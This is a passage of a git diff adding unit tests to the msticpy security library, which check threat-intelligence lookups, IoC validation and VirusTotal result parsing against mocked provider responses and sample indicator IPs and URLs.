+        result = ti_lookup.lookup_ioc(observable=ioc_url, start=start, end=end)
+        self.assertIsNotNone(result)
+        ioc_lookups = result[1]
+
+        self.assertGreaterEqual(1, len(ioc_lookups))
+        self.assertEqual(ioc_lookups[0][0], "AzSTI")
+        azs_result = ioc_lookups[0][1]
+        self.assertEqual(azs_result.ioc.lower(), ioc_url.lower())
+        self.assertEqual(azs_result.ioc_type, "url")
+        self.assertIn("alert", azs_result.details["Action"])
+        self.assertIn(True, azs_result.details["Active"])
+        self.assertIn(100, azs_result.details["ConfidenceScore"])
+        self.assertIn("Malware", azs_result.details["ThreatType"])
+
+        res_df = azs_result.raw_result
+        self.assertIsInstance(res_df, pd.DataFrame)
+        self.assertIsInstance(azs_result.reference, str)
+        self.assertTrue("ThreatIntelligenceIndicator  | where" in azs_result.reference)
+
+        # Bulk URL Lookups
+        results = ti_lookup.lookup_iocs(data=ioc_urls, start=start, end=end)
+        self.assertIsNotNone(results)
+        self.assertEqual(10, len(ioc_urls))
+        self.assertEqual(7, len(results[results["Result"]]))
+
+        # IP Lookups
+        result = ti_lookup.lookup_ioc(observable=ioc_ip, start=start, end=end)
+        self.assertIsNotNone(result)
+        ioc_lookups = result[1]
+
+        self.assertGreaterEqual(1, len(ioc_lookups))
+        self.assertEqual(ioc_lookups[0][0], "AzSTI")
+        azs_result = ioc_lookups[0][1]
+        self.assertEqual(azs_result.ioc, ioc_ip)
+        self.assertEqual(azs_result.ioc_type, "ipv4")
+        self.assertIn("alert", azs_result.details["Action"])
+        self.assertIn(True, azs_result.details["Active"])
+        self.assertIn(70, azs_result.details["ConfidenceScore"])
+        self.assertIn("Malware", azs_result.details["ThreatType"])
+
+        # Bulk IP Lookups
+        results = ti_lookup.lookup_iocs(data=ioc_ips, start=start, end=end)
+        self.assertIsNotNone(results)
+        self.assertEqual(20, len(ioc_ips))
+        self.assertEqual(15, len(results[results["Result"]]))
+
+        # Fail Lookups
+        results = ti_lookup.lookup_iocs(data={"c:\\empty_result.txt": "windows_path"})
+        self.assertEqual(results.iloc[0]["Details"], "Not found.")
+        self.assertEqual(len(results), 1)
+
+        results = ti_lookup.lookup_iocs(data={"c:\\failed_query.txt": "windows_path"})
+        self.assertEqual(results.iloc[0]["Details"], "Query failure")
+        self.assertEqual(len(results), 1)
+
+        results = ti_lookup.lookup_iocs(data={"c:\\no_dataframe.txt": "windows_path"})
+        self.assertEqual(results.iloc[0]["Details"], "Query failure")
+        self.assertEqual(len(results), 1)
diff --git a/tests/sectools/test_tiproviders.py b/tests/sectools/test_tiproviders.py
new file mode 100644
index 000000000..7ea143825
--- /dev/null
+++ b/tests/sectools/test_tiproviders.py
@@ -0,0 +1,728 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""TIProviders test class."""
+import datetime as dt
+import io
+import random
+import string
+import unittest
+import warnings
+from contextlib import redirect_stdout
+from pathlib import Path
+
+import pandas as pd
+
+from msticpy.common import pkg_config
+from msticpy.sectools.tilookup import TILookup
+from msticpy.sectools.tiproviders import (
+    get_provider_settings,
+    preprocess_observable,
+)
+from msticpy.sectools.tiproviders.ti_provider_base import (
+    TISeverity,
+    _clean_url,
+    generate_items,
+)
+from ..unit_test_lib import get_test_data_path, custom_mp_config
+
+_TEST_DATA = get_test_data_path()
+
+
+# pylint: disable=protected-access
+
+ioc_ips = [
+    "185.92.220.35",
+    "213.159.214.86",
+    "77.222.54.202",
+    "91.219.29.81",
+    "193.9.28.254",
+    "89.108.83.196",
+    "91.219.28.44",
+    "188.127.231.124",
+    "192.42.116.41",
+    "91.219.31.18",
+    "46.4.239.76",
+    "188.166.168.250",
+    "195.154.241.208",
+    "51.255.172.55",
+    "93.170.169.52",
+    "104.215.148.63",
+    "13.77.161.179",
+]
+ioc_benign_iocs = ["40.76.4.15", "40.112.72.205", "40.113.200.201"]  # benign
+
+
+def is_benign_ioc(request_item):
+    if isinstance(request_item, str):
+        return any([item for item in ioc_benign_iocs if item in request_item])
+    if isinstance(request_item, dict):
+        return any([item for item in ioc_benign_iocs if item in request_item.values()])
+    return False
+
+
+def mocked_session(*args, **kwargs):
+    del args, kwargs
+    return mock_req_session()
+
+
+# This class will mock httpx.Client()
+class mock_req_session:
+    def get(self, *args, **kwargs):
+        class MockResponse:
+            def __init__(self, json_data, status_code):
+                self.json_data = json_data
+                self.status_code = status_code
+
+            def json(self):
+                return self.json_data
+
+        if "url" not in kwargs:
+            if args:
+                kwargs.update({"url": args[0]})
+            else:
+                return MockResponse(None, 404)
+        if kwargs["url"].startswith("https://otx.alienvault.com"):
+            if is_benign_ioc(kwargs["url"]):
+                return MockResponse(None, 404)
+            mocked_result = {
+                "response": "Found stuff",
+                "pulse_info": {
+                    "pulses": [
+                        {
+                            "name": ["somename"],
+                            "tags": ["bad", "good", "ugly"],
+                            "references": ["url1", "url2"],
+                        }
+                    ]
+                },
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://api.xforce.ibmcloud.com"):
+            if is_benign_ioc(kwargs["url"]):
+                return MockResponse(None, 404)
+            mocked_result = {
+                "score": 1,
+                "cats": ["one", "two"],
+                "reason": "no reason really",
+                "reasonDescription": "what does it mean?",
+                "tags": ["bad", "good", "ugly"],
+                "malware": {
+                    "risk": "high",
+                    "family": {"type": "trojan", "name": "mybadfile"},
+                },
+                "total_rows": 4,
+                "categoryDescriptions": ["desc1", "desc2"],
+                "contact": [
+                    {
+                        "type": "registrant",
+                        "name": "Domain Administrator",
+                        "organization": "Microsoft Corporation",
+                        "country": "United States",
+                    }
+                ],
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://api.greynoise.io"):
+            if is_benign_ioc(kwargs["url"]):
+                return MockResponse(None, 404)
+            date = dt.datetime.strftime(dt.datetime.now(), "%Y-%m-%d %H:%M:%S")
+            mocked_result = {
+                "ip": "51.91.185.74",
+                "noise": True,
+                "riot": False,
+                "classification": "malicious",
+                "name": "unknown",
+                "link": "https://viz.greynoise.io/ip/51.91.185.74",
+                "last_seen": "2021-03-18",
+                "message": "Success",
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://www.virustotal.com/"):
+            if is_benign_ioc(kwargs["params"]):
+                return MockResponse(None, 404)
+            date = dt.datetime.strftime(dt.datetime.now(), "%Y-%m-%d %H:%M:%S")
+            mocked_result = {
+                "resource": "ioc",
+                "permalink": "https://virustotal.com/report.html",
+                "positives": 1,
+                "detected_urls": [
+                    {"url": "http://bad.com/foo", "positives": 1, "scan_date": date}
+                ],
+                "verbose_msg": "A long description....",
+                "response_code": 1,
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://openpagerank.com"):
+            dom_responses = {
+                "google.com": {
+                    "status_code": 200,
+                    "error": "",
+                    "page_rank_integer": 10,
+                    "page_rank_decimal": 10,
+                    "rank": "6",
+                    "domain": "google.com",
+                },
+                "microsoft.com": {
+                    "status_code": 200,
+                    "error": "",
+                    "page_rank_integer": 8,
+                    "page_rank_decimal": 7.63,
+                    "rank": "40",
+                    "domain": "microsoft.com",
+                },
+                "unknown.dom": {
+                    "status_code": 404,
+                    "error": "Domain not found",
+                    "page_rank_integer": 0,
+                    "page_rank_decimal": 0,
+                    "rank": None,
+                    "domain": "unknowndomain.com",
+                },
+            }
+
+            if "params" in kwargs:
+                mocked_result = {
+                    "status_code": 200,
+                    "response": [dom_responses["unknown.dom"]],
+                }
+                for domain in dom_responses.keys():
+                    if domain in kwargs["params"].values():
+                        mocked_result = {
+                            "status_code": 200,
+                            "response": [dom_responses[domain]],
+                        }
+                        break
+                return MockResponse(mocked_result, 200)
+            else:
+                url_param_str = kwargs["url"].split("?", 1)[1]
+                url_params = url_param_str.split("&")
+                if len(url_params) > 100:
+                    raise ValueError("Maximum of 100 items in bulk request")
+                rand_responses = []
+                for param in url_params:
+                    dom = param.split("=")[1]
+                    rank = random.randint(1, 1000)
+                    if bool(rank % 2):
+                        dom_resp = {
+                            "status_code": 200,
+                            "error": "",
+                            "page_rank_integer": rank,
+                            "page_rank_decimal": float(rank),
+                            "rank": str(rank),
+                            "domain": dom,
+                        }
+                    else:
+                        dom_resp = {
+                            "status_code": 404,
+                            "error": "Domain not found",
+                            "page_rank_integer": 0,
+                            "page_rank_decimal": 0,
+                            "rank": None,
+                            "domain": dom,
+                        }
+                    rand_responses.append(dom_resp)
+                mocked_result = {"status_code": 200, "response": rand_responses}
+                return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://api.passivetotal.org/v2/cards/summary"):
+            query = kwargs["params"]["query"]
+            if is_benign_ioc(query):
+                return MockResponse(None, 404)
+            mocked_result = {
+                "type": "IP Address",
+                "name": query,
+                "link": "https://community.riskiq.com/search/{}".format(query),
+                "netblock": "8.8.8.0/24",
+                "os": "n/a",
+                "organization": "ISP Solutions",
+                "asn": "AS11234 - ISPSOL",
+                "hosting_provider": "SuperHosters",
+                "data_summary": {
+                    "resolutions": {
+                        "count": 21,
+                        "link": "https://community.riskiq.com/search/{}/resolutions".format(
+                            query
+                        ),
+                    },
+                    "certificates": {
+                        "count": 34,
+                        "link": "https://community.riskiq.com/search/{}/domaincertificates".format(
+                            query
+                        ),
+                    },
+                    "hashes": {
+                        "count": 1,
+                        "link": "https://community.riskiq.com/search/{}/hashes".format(
+                            query
+                        ),
+                    },
+                    "projects": {
+                        "count": 1,
+                        "link": "https://community.riskiq.com/search/{}/projects".format(
+                            query
+                        ),
+                    },
+                    "articles": {
+                        "count": 5,
+                        "link": "https://community.riskiq.com/research/{}".format(
+                            query
+                        ),
+                    },
+                    "trackers": {
+                        "count": 15,
+                        "link": "https://community.riskiq.com/search/{}/trackers".format(
+                            query
+                        ),
+                    },
+                    "components": {
+                        "count": 7,
+                        "link": "https://community.riskiq.com/search/{}/components".format(
+                            query
+                        ),
+                    },
+                    "host_pairs": {
+                        "count": 9,
+                        "link": "https://community.riskiq.com/search/{}/hostpairs".format(
+                            query
+                        ),
+                    },
+                    "cookies": {
+                        "count": 25,
+                        "link": "https://community.riskiq.com/search/{}/cookies".format(
+                            query
+                        ),
+                    },
+                },
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://api.passivetotal.org/v2/reputation"):
+            query = kwargs["params"]["query"]
+            if is_benign_ioc(query):
+                return MockResponse(None, 404)
+            score = random.randint(0, 100)
+            if score == 100:
+                classification = "MALICIOUS"
+            elif score >= 70:
+                classification = "SUSPICIOUS"
+            else:
+                classification = "UNKNOWN"
+            mocked_result = {
+                "score": score,
+                "classification": classification,
+                "rules": [
+                    {
+                        "name": "Blocklist Malware",
+                        "description": "Observed malware on this entity",
+                        "severity": 5,
+                        "link": None,
+                    },
+                    {
+                        "name": "Name server",
+                        "description": "Domain is using a name server that is more likely to be used by malicious infrastructure",
+                        "severity": 4,
+                        "link": None,
+                    },
+                    {
+                        "name": "ASN",
+                        "description": "Infrastructure hosted by this ASN are more likely to be malicious",
+                        "severity": 4,
+                        "link": None,
+                    },
+                    {
+                        "name": "TLD",
+                        "description": "Domains in this TLD are more likely to be malicious",
+                        "severity": 3,
+                        "link": None,
+                    },
+                ],
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith(
+            "https://api.passivetotal.org/v2/enrichment/malware"
+        ):
+            query = kwargs["params"]["query"]
+            if is_benign_ioc(query):
+                return MockResponse(None, 404)
+            mocked_result = {
+                "success": True,
+                "results": [
+                    {
+                        "collectionDate": "2021-01-01",
+                        "sample": "36190e9c66c801bc393b8189a5aeaf22",
+                        "source": "Malsource Info",
+                        "sourceUrl": "https://mocked.url/md5/36190e9c66c801bc393b8189a5aeaf22",
+                    },
+                    {
+                        "collectionDate": "2020-09-25",
+                        "sample": "1c1033f184cc33c87cb6aa54a955d034",
+                        "source": "Malsource Info",
+                        "sourceUrl": "https://mocked.url/md5/1c1033f184cc33c87cb6aa54a955d034",
+                    },
+                ],
+            }
+            return MockResponse(mocked_result, 200)
+        elif kwargs["url"].startswith("https://api.intsights.com"):
+            if is_benign_ioc(kwargs["params"]):
+                return MockResponse(None, 404)
+            date = dt.datetime.strftime(dt.datetime.now(), "%Y-%m-%dT%H:%M:%S.%fZ")
+            mocked_result = {
+                "Value": "124.5.6.7",
+                "Type": "IpAddresses",
+                "Score": 42,
+                "Severity": "Medium",
+                "Whitelist": False,
+                "FirstSeen": date,
+                "LastSeen": date,
+                "LastUpdate": date,
+                "Sources": [
+                    {"ConfidenceLevel": 2, "Name": "Source A"},
+                    {"ConfidenceLevel": 1, "Name": "Source B"},
+                    {"ConfidenceLevel": 1, "Name": "Source C"},
+                    {"ConfidenceLevel": 3, "Name": "Source D"},
+                ],
+                "SystemTags": ["bot", "malware related"],
+                "Geolocation": "FR",
+                "RelatedMalware": ["malware1"],
+                "RelatedCampaigns": ["Campaign A"],
+                "RelatedThreatActors": ["Threat Actor 00"],
+                "Tags": ["tag"],
+            }
+            return MockResponse(mocked_result, 200)
+        return MockResponse(None, 404)
+
+
+class TestTIProviders(unittest.TestCase):
+    """Unit test class."""
+
+    ti_lookup = None
+
+    def setUp(self):
+        self.config_path = Path(_TEST_DATA).joinpath(pkg_config._CONFIG_FILE)
+        self.ti_lookup = self.load_ti_lookup()
+
+    def load_ti_lookup(self):
+        with custom_mp_config(self.config_path):
+            with warnings.catch_warnings():
+                # We want to ignore warnings from missing config
+                warnings.simplefilter("ignore", category=UserWarning)
+                return TILookup()
+
+    def test_ti_config_and_load(self):
+        config_path = Path(_TEST_DATA).parent.joinpath("msticpyconfig-test.yaml")
+        with custom_mp_config(config_path):
+            with warnings.catch_warnings():
+                # We want to ignore warnings from missing config
+                warnings.simplefilter("ignore", category=UserWarning)
+                ti_settings = get_provider_settings()
+
+                self.assertIsInstance(ti_settings, dict)
+                self.assertGreaterEqual(len(ti_settings), 4)
+
+        # Try to load TIProviders - should throw a warning on
+        # missing provider class
+
+        with custom_mp_config(self.config_path):
+            with self.assertWarns(UserWarning):
+                ti_lookup = TILookup()
+
+        # should have 2 succesfully loaded providers
+        self.assertGreaterEqual(len(ti_lookup.loaded_providers), 3)
+        self.assertGreaterEqual(len(ti_lookup.provider_status), 3)
+
+    def test_tilookup_utils(self):
+        av_provs = self.ti_lookup.available_providers
+        self.assertGreaterEqual(len(av_provs), 1)
+        self.ti_lookup.provider_usage()
+        self.ti_lookup.list_available_providers(show_query_types=True)
+        with custom_mp_config(self.config_path):
+            with self.assertWarns(UserWarning):
+                self.ti_lookup.reload_providers()
+
+    def test_xforce(self):
+        self.exercise_provider("XForce")
+
+    def test_otx(self):
+        self.exercise_provider("OTX")
+
+    def test_virus_total(self):
+        self.exercise_provider("VirusTotal")
+
+    def test_greynoise(self):
+        self.exercise_provider("GreyNoise")
+
+    def test_riskiq(self):
+        self.exercise_provider("RiskIQ")
+
+    def test_intsights(self):
+        self.exercise_provider("IntSights")
+
+    def exercise_provider(self, provider_name):
+        ti_lookup = self.ti_lookup
+
+        ti_provider = ti_lookup.loaded_providers[provider_name]
+        saved_session = ti_provider._httpx_client
+        ti_provider._httpx_client = mock_req_session()
+
+        iocs = {
+            "124.5.6.7": ("ipv4", None),
+            "124.5.6.8": ("ipv4", "rep"),
+            "124.5.6.9": ("ipv4", "malware"),
+            "124.5.6.10": ("ipv4", "whois"),
+            "office.microsoft.com": ("dns", "info"),
+            "https://badplace.net/path1/path2?x=1": ("url", None),
+            "7657fcb7d772448a6d8504e4b20168b7": ("file_hash", None),
+            "7657fcb7d772448a6d8504e4b20168b8": ("md5_hash", None),
+            "www.microsoft.com": ("hostname", "whois"),
+        }
+
+        # Lookup multiple IoCs
+        for ioc, ioc_params in iocs.items():
+            result = ti_lookup.lookup_ioc(
+                observable=ioc,
+                ioc_type=ioc_params[0],
+                ioc_query_type=ioc_params[1],
+                providers=[provider_name],
+            )
+            self.verify_result(result)
+
+        results_df = ti_lookup.lookup_iocs(
+            data=(ioc_ips + ioc_benign_iocs), providers=[provider_name]
+        )
+        self.assertEqual(20, len(results_df))
+        self.assertEqual(17, len(results_df[results_df["Result"]]))
+
+        ti_provider._httpx_client = saved_session
+
+    # pylint: disable=pointless-statement
+    def verify_result(self, result):
+        self.assertIsNotNone(result)
+        for prov, lu_result in result[1]:
+            self.assertIn(
+                prov,
+                ["OTX", "XForce", "VirusTotal", "GreyNoise", "RiskIQ", "IntSights"],
+            )
+            self.assertIsNotNone(lu_result.ioc)
+            self.assertIsNotNone(lu_result.ioc_type)
+            if lu_result.result:
+                self.assertIsNotNone(lu_result.details)
+                self.assertIsNotNone(lu_result.raw_result)
+                self.assertIsNotNone(lu_result.reference)
+                # exercise summary functions of Lookup class
+                output = io.StringIO()
+                with redirect_stdout(output):
+                    lu_result.summary
+                self.assertIsNotNone(output.getvalue())
+                output = io.StringIO()
+                with redirect_stdout(output):
+                    lu_result.raw_result_fmtd
+                self.assertIsNotNone(output.getvalue())
+
+    def test_opr_single_lookup(self):
+        ti_lookup = self.ti_lookup
+
+        ti_provider = ti_lookup.loaded_providers["OPR"]
+        ti_provider._httpx_client = mock_req_session()
+        iocs = {
+            "google.com": ("dns", None),
+            "microsoft.com": ("dns", None),
+            "badplace.net": ("dns", None),
+        }
+
+        # Lookup multiple IoCs
+        for ioc, ioc_params in iocs.items():
+            result = ti_lookup.lookup_ioc(
+                observable=ioc,
+                ioc_type=ioc_params[0],
+                ioc_query_type=ioc_params[1],
+                providers=["OPR"],
+            )
+            self.assertIsNotNone(result)
+            for _, lu_result in result[1]:
+                self.assertIsNotNone(lu_result.ioc)
+                self.assertIsNotNone(lu_result.ioc_type)
+                if lu_result.severity in ["warning", "high"]:
+                    self.assertTrue(
+                        "rank" in lu_result.details
+                        and lu_result.details["rank"] is None
+                    )
+                    self.assertTrue(
+                        "error" in lu_result.details
+                        and lu_result.details["error"] == "Domain not found"
+                    )
+                else:
+                    self.assertTrue(
+                        "rank" in lu_result.details
+                        and lu_result.details["rank"].isdigit()
+                        and int(lu_result.details["rank"]) > 0
+                    )
+                    self.assertTrue(
+                        "response" in lu_result.raw_result
+                        and lu_result.raw_result["response"][0]
+                        and lu_result.raw_result["response"][0]["domain"] == ioc
+                    )
+
+    def test_opr_bulk_lookup(self):
+        ti_lookup = self.ti_lookup
+
+        ti_provider = ti_lookup.loaded_providers["OPR"]
+        ti_provider._httpx_client = mock_req_session()
+
+        n_requests = 250
+        gen_doms = {self._generate_rand_domain(): "dns" for i in range(n_requests)}
+        results_df = ti_lookup.lookup_iocs(data=gen_doms, providers=["OPR"])
+        self.assertEqual(n_requests, len(results_df))
+        self.assertGreater(
+            len(results_df[results_df["Severity"].isin(["warning", "high"]) > 0]),
+            n_requests / 3,
+        )
+        self.assertEqual(n_requests, len(results_df[results_df["Result"]]))
+
+    def _generate_rand_domain(self):
+        dom_suffixes = ["com", "org", "net", "biz"]
+        letters = string.ascii_letters
+        str_length = random.randint(4, 20)
+        dom = ""
+        for _ in range(2):
+            dom_part = "".join(random.choice(letters) for i in range(str_length))
+            dom = dom + "." + dom_part if dom else dom_part
+        suffix = random.choice(dom_suffixes)
+
+        return dom + "." + suffix
+
+    def test_tor_exit_nodes(self):
+        ti_lookup = self.ti_lookup
+
+        # we can't use a fixed list since this changes all the time
+        # so take a sample from the current list
+        tor_prov = ti_lookup.loaded_providers["Tor"]
+        tor_nodes = random.sample(list(tor_prov._nodelist.keys()), 4)
+
+        other_ips = [
+            "104.117.0.237",
+            "13.107.4.50",
+            "172.217.10.144",
+            "172.217.11.16",
+            "172.217.15.112",
+        ]
+
+        pos_results = []
+        neg_results = []
+        for ioc in tor_nodes + other_ips:
+            result = ti_lookup.lookup_ioc(
+                observable=ioc, ioc_type="ipv4", providers=["Tor"]
+            )
+            lu_result = result[1][0][1]
+            self.assertTrue(lu_result.result)
+            self.assertTrue(bool(lu_result.reference))
+            if lu_result.severity in ["warning", "high"]:
+                self.assertTrue(bool(lu_result.details))
+                self.assertTrue(bool(lu_result.raw_result))
+                pos_results.append(lu_result)
+            else:
+                neg_results.append(lu_result)
+
+        self.assertEqual(len(pos_results), 4)
+        self.assertEqual(len(neg_results), 5)
+
+        all_ips = tor_nodes + other_ips
+        tor_results_df = ti_lookup.lookup_iocs(data=all_ips, providers=["Tor"])
+        self.assertEqual(len(all_ips), len(tor_results_df))
+        self.assertEqual(
+            len(tor_results_df[tor_results_df["Severity"].isin(["warning", "high"])]), 4
+        )
+        self.assertEqual(
+            len(tor_results_df[tor_results_df["Severity"] == "information"]), 5
+        )
+
+    def test_check_ioc_type(self):
+        provider = self.ti_lookup.loaded_providers["OTX"]
+        lu_result = provider._check_ioc_type(ioc="a.b.c.d", ioc_type="ipv4")
+        self.assertEqual(lu_result.status, 2)
+        lu_result = provider._check_ioc_type(ioc="a.b.c.d", ioc_type="ipv6")
+        self.assertEqual(lu_result.status, 2)
+        lu_result = provider._check_ioc_type(ioc="url", ioc_type="ipv4")
+        self.assertEqual(lu_result.status, 2)
+        lu_result = provider._check_ioc_type(ioc="123", ioc_type="dns")
+        self.assertEqual(lu_result.status, 2)
+        lu_result = provider._check_ioc_type(ioc="424246", ioc_type="file_hash")
+        self.assertEqual(lu_result.status, 2)
+
+    def test_tiseverity(self):
+        sev_inf = TISeverity.parse("information")
+        self.assertEqual(sev_inf, TISeverity.information)
+        sev_warn = TISeverity.parse(1)
+        self.assertEqual(sev_warn, TISeverity.warning)
+        sev_warn2 = TISeverity.parse(sev_warn)
+        self.assertEqual(sev_warn2, TISeverity.warning)
+
+        sev_unknown = TISeverity.unknown
+        self.assertTrue(sev_inf == TISeverity.information)
+        self.assertTrue(sev_inf <= "information")
+        self.assertTrue(sev_inf < 1)
+        self.assertTrue(sev_warn > TISeverity.information)
+        self.assertFalse(sev_unknown > "high")
+
+    def test_preprocess_observables(self):
+        t_url = "https://me@www.microsoft.com:443/test1?testparam=x"
+        self.assertEqual(_clean_url(t_url), t_url.split("?")[0])
+
+        loopback_mssg = "Host part of URL is a private IP address"
+        result = preprocess_observable(
+            "https://127.0.0.1/test1?testparam=x", ioc_type="url"
+        )
+        self.assertEqual(result.status, loopback_mssg)
+        result = preprocess_observable("127.0.0.1", ioc_type="ipv4")
+        self.assertEqual(result.status, "IP address is not global")
+        result = preprocess_observable("not an ip address", ioc_type="ipv4")
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for ipv4"
+        )
+        result = preprocess_observable("185.92.220.35", ioc_type="ipv6")
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for ipv6"
+        )
+        result = preprocess_observable(
+            "2001:0db8:85a3:0000:0000:8a2e:0370:7334", ioc_type="ipv4"
+        )
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for ipv4"
+        )
+        result = preprocess_observable("localhost", ioc_type="dns")
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for dns"
+        )
+        result = preprocess_observable("185.92.220.35", ioc_type="dns")
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for dns"
+        )
+        result = preprocess_observable("AAAAAAAAAAAAAAAA", ioc_type="md5")
+        self.assertEqual(
+            result.status, "Observable does not match expected pattern for md5"
+        )
+
+    def test_iterable_generator(self):
+        test_df = pd.DataFrame({"col1": ioc_ips, "col2": ioc_ips})
+
+        for ioc, _ in generate_items(test_df, obs_col="col1", ioc_type_col="col2"):
+            self.assertIn(ioc, ioc_ips)
+
+        for ioc, ioc_type in generate_items(test_df[["col1"]], obs_col="col1"):
+            self.assertIn(ioc, ioc_ips)
+            self.assertEqual(ioc_type, "ipv4")
+
+    # Used for local testing only
+    # def test_interactive(self):
+    #     saved_env = os.environ[pkg_config._CONFIG_ENV_VAR]
+    #     os.environ[pkg_config._CONFIG_ENV_VAR] = "e:\\src\\microsoft\\msticpyconfig.yaml"
+    #     pkg_config.refresh_config()
+    #     if "AzureSentinel" in pkg_config.custom_settings["TIProviders"]:
+    #         pkg_config.custom_settings["TIProviders"].pop("AzureSentinel")
+    #     ti_lookup = TILookup()
+
+    #     result = ti_lookup.lookup_ioc(
+    #         observable="www.401k.com", providers=["OPR", "VirusTotal", "XForce"]
+    #         )
+
+    #     os.environ[pkg_config._CONFIG_ENV_VAR] = saved_env
diff --git a/tests/sectools/test_vtlookup.py b/tests/sectools/test_vtlookup.py
new file mode 100644
index 000000000..9e5ecc5c1
--- /dev/null
+++ b/tests/sectools/test_vtlookup.py
@@ -0,0 +1,233 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""vtlookup test class."""
+import unittest
+from os import path
+
+from msticpy.sectools.tiproviders.ti_provider_base import preprocess_observable
+from msticpy.sectools.vtlookup import VTLookup
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+# pylint: disable=protected-access
+
+
+class TestVTLookup(unittest.TestCase):
+
+    _TEST_COLS = [
+        "Observable",
+        "IoCType",
+        "Status",
+        "ResponseCode",
+        "Resource",
+        "SourceIndex",
+        "VerboseMsg",
+        "Resource",
+        "ScanId",
+        "Permalink",
+        "Positives",
+        "MD5",
+        "SHA1",
+        "SHA256",
+        "ResolvedDomains",
+        "ResolvedIPs",
+        "DetectedUrls",
+    ]
+
+    def test_ipvalidation(self):
+        test_ips = [
+            ("valid", "90.156.201.27", "90.156.201.27"),
+            ("local_ip", "10.0.0.1", None),
+            ("mask", "255.255.20.27", None),
+            ("loopback", "127.0.0.1", None),
+            ("bad_format", "122.1.3", None),
+        ]
+
+        for test_case in test_ips:
+            result, status = preprocess_observable(test_case[1], "ipv4")
+            self.assertEqual(result, test_case[2])
+            print(test_case[0], status)
+
+    def test_urlvalidation(self):
+        v1_url = "http://club-fox.ru/img/www.loginalibaba.com/alibaba/alibaba/login.alibaba.com.php?email=biuro"
+        v2_url = "https://www.virustotal.com/en/ip-address/90.156.201.27/information/"
+        test_urls = [
+            ("valid1", v1_url, v1_url),
+            ("valid2", "https://microsoft.com", "https://microsoft.com"),
+            ("valid3", "https://python.org", "https://python.org"),
+            ("valid3", v2_url, v2_url),
+            ("local_ip", "http://10.0.0.1/foo", None),
+            ("local_hostname", "https://myhost/path", None),
+            ("invalid1", "http//club-fox.ru/foo.html", None),
+            ("invalid2", "//club-fox.ru/foo.html", None),
+            ("invalid3", "https://123:microsoft.com@user/foo.txt", None),
+            ("invalid4", "http//10.0.0.1/foo.txt", None),
+        ]
+
+        for test_case in test_urls:
+            result, status = preprocess_observable(test_case[1], "url")
+            print(test_case[0], status)
+            self.assertEqual(
+                result,
+                test_case[2],
+                f"Failed on test case {test_case} ({test_case[1]})",
+            )
+
+    def test_parse_file_results(self):
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+
+        FILE_NAME = path.join(TEST_DATA_PATH, "fileresponse.json")
+        with open(FILE_NAME, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["file"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="md5_hash",
+            vt_param=vt_params,
+        )
+
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        print(test_df.T)
+
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+        FILE_NAME2 = path.join(TEST_DATA_PATH, "file-multi_pos.json")
+        with open(FILE_NAME2, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["file"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="md5_hash",
+            vt_param=vt_params,
+        )
+
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 3)
+        print(test_df.T)
+
+    def test_parse_url_results(self):
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+
+        FILE_NAME = path.join(TEST_DATA_PATH, "url_pos.json")
+        with open(FILE_NAME, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["url"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="url",
+            vt_param=vt_params,
+        )
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        print(test_df.T)
+
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+        FILE_NAME2 = path.join(TEST_DATA_PATH, "url_neg.json")
+        with open(FILE_NAME2, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["url"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="url",
+            vt_param=vt_params,
+        )
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        print(test_df.T)
+
+    def test_parse_domain_results(self):
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+
+        FILE_NAME = path.join(TEST_DATA_PATH, "domain_pos.json")
+        with open(FILE_NAME, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["domain"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="dns",
+            vt_param=vt_params,
+        )
+
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        self.assertGreater(len(test_df[["ResolvedIPs"]]), 0)
+        self.assertGreater(len(test_df[["DetectedUrls"]].values), 0)
